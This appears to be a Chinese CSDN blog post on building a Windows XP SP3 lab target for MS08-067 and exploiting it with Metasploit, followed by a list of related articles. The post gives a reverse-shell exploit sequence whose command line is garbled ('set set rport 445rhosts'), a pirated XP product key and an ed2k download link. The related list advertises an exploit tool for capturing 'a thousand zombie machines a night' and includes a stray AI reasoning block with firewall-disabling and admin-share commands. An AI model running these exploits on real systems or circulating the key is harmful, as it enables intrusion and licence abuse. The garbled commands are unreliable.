ms08-067漏洞靶机配置

最新推荐文章于 2024-03-25 22:33:43 发布
最新推荐文章于 2024-03-25 22:33:43 发布
阅读量1.5k 收藏 13
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_46137328/article/details/105424604
版权

ms08-067这个漏洞是我们在学习msf的时候一个最基础的漏洞,很多教程都会提及,但是这个漏洞对复现环境很挑剔,导致很多人复现不成功。这两天又在看这个漏洞,所以把漏洞环境配置发出来。

0X00 准备工作

首先是镜像,选择xp sp3中文版。在msdn中选择

zh-hans_windows_xp_professional_with_service_pack_3_x86_cd_vl_x14-74070.iso

下载链接:

ed2k://|file|zh-hans_windows_xp_professional_with_service_pack_3_x86_cd_vl_x14-74070.iso|630237184|EC51916C9D9B8B931195EE0D6EE9B40E|/

迅雷下载贼快。

安装密钥:

M6TF9-8XQ2M-YQK9F-7TBB2-XGG88

如果有更多需求,在百度知道的https://zhidao.baidu.com/question/1987691629013126747.html这个问答中有更多的密钥可以使用。

0X01 漏洞利用

1、安装完成后,在控制面板中关闭防火墙,关闭自动更新。

2、设置一个文件夹共享,点击我的文档--共享文档处右键--- 共享和安全---共享---在网络上共享这个文件夹(共享名可以默认)---确定

3、保证Computer Browser、Server、WorkStation三个服务是开启状态,如果利用的时候失败,这三个服务可能关闭,需要手动打开。

4、保存快照(这个漏洞有时利用成功,有时利用不成功,所以建议保存快照)

5、用msf利用该漏洞

use exploit/windows/smb/ms08_067_netapi
set set rport 445rhosts 192.168.1.101(目标地址)
set payload windows/shell/reverse_tcp
set lhost 192.168.1.109(本机地址)
set target 34(一定要设置target为34,不要让他自己识别,那样会导致利用不成功)
exploit -j

长按下方图片关注我们:

xju_lr
关注
漏洞payload 靶机_自主学习1 Metasploit的简单使用 (ms08-067漏洞利用)
weixin_39655981的博客
12-12 319
大家好啊,初次见面,对于一个安全小白来说,想通过这样的方式整理自己的思路并且和你们交流,还请各位大佬,同白多多指教,话不多说让我们开始这有趣的东西吧!!简介kali linux :一个集成了许多攻击工具的操做系统(可以把它想象成为一个武器库,它本只是管理武器,而不是武器)windows xp:这不用我多介绍了吧metasploit一个比较好用的漏洞利用(核心功能)工具,更准确的说法说它是一个渗透框...
ms08-067 漏洞攻击(远程命令执行)
m0_74062309的博客
07-11 728
老系统漏洞修复更新系统升级到最新的Windows系统,安装KB958644补丁。修改远程桌面默认端口,或关闭该服务学习如同播种,只要你辛勤耕耘,必将收获丰硕的果实,相信你的努力不会白费。
MS08067,MS10061漏洞靶机环境搭建.docx
07-07
MS08067,MS10061漏洞靶机环境搭建过程,演示靶机的搭建过程,用于攻防演练,渗透小白可以看一下
MS08-067漏洞 入侵Windows7
qq_34835962的博客
04-10 1835
渗透测试基础-1 针对MS08-067漏洞
zhangyixing_mj的博客
05-07 529
一、准备工作 工具环境:kali下载安装 靶场环境: 1.kali切换到root权限。有两种方式:直接切换到管理员权限,这种方式虽然比较方便,但是也比较危险,root权限很大,如果有误操作会产生较大的影响;当某些操作需要管理员权限时,临时提权,该操作结束后,恢复普通用户权限。推荐第二种方 sudo su #切换到管理员权限下 sudo ifconfig #临时对ifconfig操作提权 2.将kali和靶场winXP设置到同一局域网下,将二者的网络适配器均设置为 仅主机模式。 操作:选中.
MS08-067靶机下载
边城浪子的博客
09-08 1828
利用Windows平台MS08-067漏洞,成功进行远程命令执行操作,无奈没有靶机实验,真实的互联网中也没有这样的漏洞啊。 MS08-067靶机下载地址 链接: https://pan.baidu.com/s/13IS0vBZTduDHdInOrO4pyQ 提取码: ip53
MS08_067漏洞复现
weixin_45291045的博客
05-15 2034
原理 攻击者利用受害主机默认开放的SMB服务端口445,发送恶意资料到该端口,通过MSRPC接口调用server服务的一个函数,并破坏程序的栈缓冲区,获取远程代码执行的权限,从而完全控制主机 环境准备 攻击机kali 192.168.182.130 靶机 windows xp 中文版 192.168.182.129 靶机关闭防火墙,靶机需要在攻击机的网段中 端口扫描 使用nmap探测ip网段上存活的主机及开放的端口 nmap -sV -n 192.168.182.0/24 -sV表示扫描系统版本及服务信
ms08-067漏洞的复现
weixin_30466421的博客
03-28 816
MS08-067漏洞重现 (1):MS08-067远程溢出漏洞描述 MS08-067漏洞的全称为“WindowsServer服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的RPC请求,则该漏洞可能允许远程执行代码。在MicrosoftWindows2000WindowsXP和WindowsServer2003系统上,攻击者可能未经身份验证即可利用此漏洞...
【网络安全】利用MS-08-067漏洞渗透WindowsXP过程
qq_61415450的博客
03-25 1243
网络安全,
MS08-067漏洞复现实验
0day
06-18 1606
MS08-067漏洞复现实验 实现环境准备: 攻击机:kali(IP:192.168.153.129) 目标靶机:Windows XP(IP:192.168.153.128) 攻击工具:metasploit-framework,nmap 实验步骤 第一步:使用nmap扫描目标靶机,判断其是否存在ms08-067漏洞 nmap -n -p 445 --script smb-vuln-ms08-067 192.168.153.128 --open 扫描发现该目标靶机存在该漏洞,具备实验条件 第二步:打开met
可用的ms08-067漏洞溢出程序(带源码)
05-19
MS08-067 最新利用工具 直接溢出后开启对方4444端口 —————————————————————————————————————— 经过测试从XP到2000、2003、Vista都可以拿下权限,对方机器要有TCP139或TCP445端口 使用效果是,基本上一晚上拿千台肉鸡不是问题…… MS08-067.exe 然后直接telnet 对方 4444端口即可。
使用Nmap漏扫+Metasploit渗透测试框架,利用MS08-067漏洞渗透
george1898的博客
12-25 1357
本期框架介绍:Metasploit是一一款开源的安全漏洞检测工具。它可以帮助用户识别安全问题,验证漏洞的缓解措施,并对某些软件进行安全评估,提供真正的安全风险情报。当用户第一次接触Metasploit渗透测试框架软件(MSF)时,可能会被它提供如此多的接口中、选项、变量和模块所震撼,而感觉无所适从。下面我们将应用一个安全来熟透认知、一起来探讨它的微妙吧!
Windows XP SP2 (Simplified Chinese MS08_067漏洞复现)
qq_43093288的博客
03-25 2221
MS08-067漏洞全称是“Windows Server服务RPC请求缓冲区溢出漏洞”,Windows的Server服务在处理特制RPC请求时存在缓冲区溢出漏洞。注:发现Windows XP SP2 (Simplified Chinese)存在多个漏洞:ms17-010,ms08-067,,但是我们现在只考虑ms08-067。注:发现Windows XP SP2 (Simplified Chinese)的IP:172.16.12.101。
MS08-067漏洞复现
一个未完成的故事
08-02 3507
漏洞简介: MS08-067漏洞将会影响除Windows Server 2008 Core以外的所有Windows系统,包括:Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。(来自百度百科) 危害: 黑客可以利用该漏洞向网络中的电脑发出远程的特制RPC请求,无需身份验证便可在电脑中任意执行远程代码。这就是说,即便你的电脑设置了管理员密码,也只能任由黑客摆布。(
kali利用msf工具对ms08-067漏洞入侵靶机(win xp2)
qq_50854662的博客
05-16 6263
kali利用msf工具对ms08-067漏洞入侵靶机(win xp2) 漏洞简介 MS08-067漏洞将会影响Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。 如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利
使用MS08-067 漏洞攻击xp靶机
weixin_30877227的博客
07-11 601
一、攻击前的准备 Linux 虚拟机 用于运行大名鼎鼎的msf xp sp3 中文版 (或者其他版本) 二、准备攻击 在msfconsole 中搜索漏洞编号 查看该漏洞支持的平台 Available targets: Id Name -- ---- 0 Automatic Targeting 1 Windows 2000...
Mr.Robot靶机 - 机器人先生
Ms08067安全实验室
03-02 2368
本文作者:恩格尔-src小组﹀﹀﹀靶机简介:靶机主题来自美剧《黑客军团》,这是一部传达极客精神和黑客文化的上佳作品,不同于《硅谷》的搞笑风格,这部剧的主角Eliot患有精神分裂,整部剧的...
MS08067/MS10061漏洞靶机环境搭建总结
热门推荐
SQL_injection的专栏
08-15 1万+
MS08067/MS10061漏洞靶机环境搭建总结
红日靶场1环境搭建
最新发布
03-20
<think>好的,用户想了解如何搭建红日靶场环境,需要教程和配置指南。我需要根据提供的引用信息来整理步骤。首先,引用[1]和[2]提到了红日靶场的官网和配置说明,应该从这里获取官方资料。引用[3]中的内容详细描述了靶场搭建的拓扑图、网络配置,以及外网打点的步骤,比如nmap扫描、目录扫描、利用phpmyadmin日志getshell等。引用[4]提供了一个超详细的操作指南,适合新手,可能包含具体的虚拟机设置和权限配置,比如关闭Win7防火墙、黄金票据的制作问题。此外,用户可能需要知道环境搭建后的内网攻击步骤,如ms17_010漏洞扫描和利用。 需要注意的是,引用[3]中的目录结构可能对应不同的阶段,比如外网渗透、内网信息搜集、横向移动等,但用户现在需要的是环境搭建部分。所以应该聚焦在拓扑图配置、网络设置、虚拟机安装等方面。引用[4]提到制作黄金票据后访问域控的问题,虽然属于后期渗透测试的内容,但环境搭建时需要正确配置域控权限和网络策略,避免出现访问问题。 另外,用户可能对虚拟机软件的选择(如VMware或VirtualBox)、镜像导入、网络适配器配置(如NAT、仅主机模式)有疑问,需要详细说明。引用[3]中的“配置网络”可能涉及设置多个虚拟机的IP地址,确保它们在同一子网内,并正确隔离内外网环境。可能还需要关闭防火墙(如Win7防火墙)以便测试,如引用[4]所述。 需要提醒用户注意版权问题,确保从官网下载资源,避免使用非官方镜像。同时,步骤中可能涉及复杂的内网渗透配置,建议分阶段验证,例如先确保各虚拟机互通,再测试外网到内网的连通性。可能遇到的常见问题包括网络不通、服务未启动、权限配置错误等,需提供排查方法,比如检查IP设置、服务状态、防火墙规则等。 最后,根据引用[5],可能有培训课程提供更深入的指导,但用户目前只需基础搭建步骤。因此,回答应结构清晰,分步骤说明,并附上相关引用来源,确保信息可靠。需要检查是否有遗漏的关键点,如虚拟机快照管理、必要的软件安装(如phpMyAdmin、XSS平台等),以及后续测试的基本流程概述,帮助用户搭建后验证环境是否成功。</think>### 红日靶场环境搭建指南 #### 1. **环境准备** - **官网资源下载** 访问红日靶场官网[^2]获取镜像文件(如Windows Server、Win7等虚拟机镜像)及拓扑图。建议使用VMware Workstation或VirtualBox作为虚拟化平台。 - **网络拓扑理解** 根据引用[3]中的靶场拓扑图,配置内外网隔离环境。典型结构包含外网WEB服务器、内网域控服务器(DC)和多个内网主机,需设置NAT和仅主机模式网卡实现网络分层。 #### 2. **虚拟机配置** - **镜像导入与网络适配** 将下载的OVA/OVF镜像导入虚拟机软件,为每台虚拟机分配网络适配器: - **WEB服务器**:外网网卡(NAT模式) + 内网网卡(仅主机模式) - **内网主机(如Win7)**:仅主机模式网卡 - **域控服务器(DC)**:仅主机模式网卡 - **IP地址设置** 根据拓扑图手动配置静态IP,确保内外网互通。例如: - WEB服务器外网IP:`192.168.1.100`,内网IP:`10.10.10.2` - 域控服务器IP:`10.10.10.1` - Win7主机IP:`10.10.10.3` #### 3. **服务与权限配置** - **关闭防火墙** 在Win7和域控服务器中关闭系统防火墙(引用[4]),避免拦截测试流量: ```cmd netsh advfirewall set allprofiles state off ``` - **域环境搭建** 在域控服务器安装Active Directory服务,创建测试域(如`test.local`),将Win7主机加入域。确保域账户权限正常,用于后续黄金票据测试[^4]。 #### 4. **漏洞环境验证** - **外网渗透测试** 使用Kali Linux对WEB服务器进行扫描(引用[3]): ```bash nmap -sV 192.168.1.100 dirsearch -u http://192.168.1.100 -e php,asp ``` - **内网连通性检查** 从WEB服务器通过内网IP访问域控共享目录,验证网络隔离是否生效: ```cmd dir \\10.10.10.1\C$ ``` #### 5. **常见问题解决** - **网络不通** 检查虚拟机网卡模式、IP地址是否冲突,确保网关和DNS设置正确。 - **权限访问失败** 若黄金票据制作后仍无法访问域控(引用[4]),需检查Kerberos票据有效期、系统时间同步及SPN配置
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值